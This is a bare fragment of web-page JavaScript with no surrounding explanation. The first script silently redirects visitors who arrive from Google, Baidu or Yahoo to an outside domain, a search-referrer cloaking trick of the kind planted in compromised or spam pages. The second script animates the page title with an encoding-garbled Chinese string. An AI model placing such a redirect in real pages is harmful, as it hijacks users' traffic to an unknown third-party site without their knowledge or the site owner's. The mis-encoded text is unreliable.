<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 
location.href="http://www.eduaskyx.com/";
</script>
<script LANGUAGE="Javascript">
　　var message = new Array();
　　message[0] = "嶄匳劍伏,";
　　var reps = 1;
　　var speed = 0;// Set the overall typing speed (larger number = slower action).
　　var hold = 4111111 // set the length of time to display the whole phrase before retyping 

(larger number = longer)
　　var p = message.length;
　　var q = 0;
　　var r = 0;
　　var C = 0;
　　var mC = 0;
　　var s = 0;
　　var sT = null;
　　if (reps < 1) {
　 　reps = 1;
　　}
　　function setMessage() {
　 　typing = message[mC];
　 　q = typing.length;
　 　r = q + hold;
　 　typeMessage();
　　}
　　function typeMessage() {
　 　if (s > r) {
　  　s = 0;
　 　}
　 　if (s > q) {
　  　document.title = typing ;
　 　}
 　　else {
　  　document.title = typing.substr(0,s);
　 　}
　 　if (C < (r * reps)) {
　  　sT = setTimeout("typeMessage()", speed);
　  　C++;
  　　s++;
　 　}
　 　else {
　  　C = 0;
　  　s = 0;
　  　mC++;
　  　if(mC > p - 1) {mC = 0;}
　  　sT = null;
　  　setMessage();
　 　}
　　}
　　setMessage();
　　</script>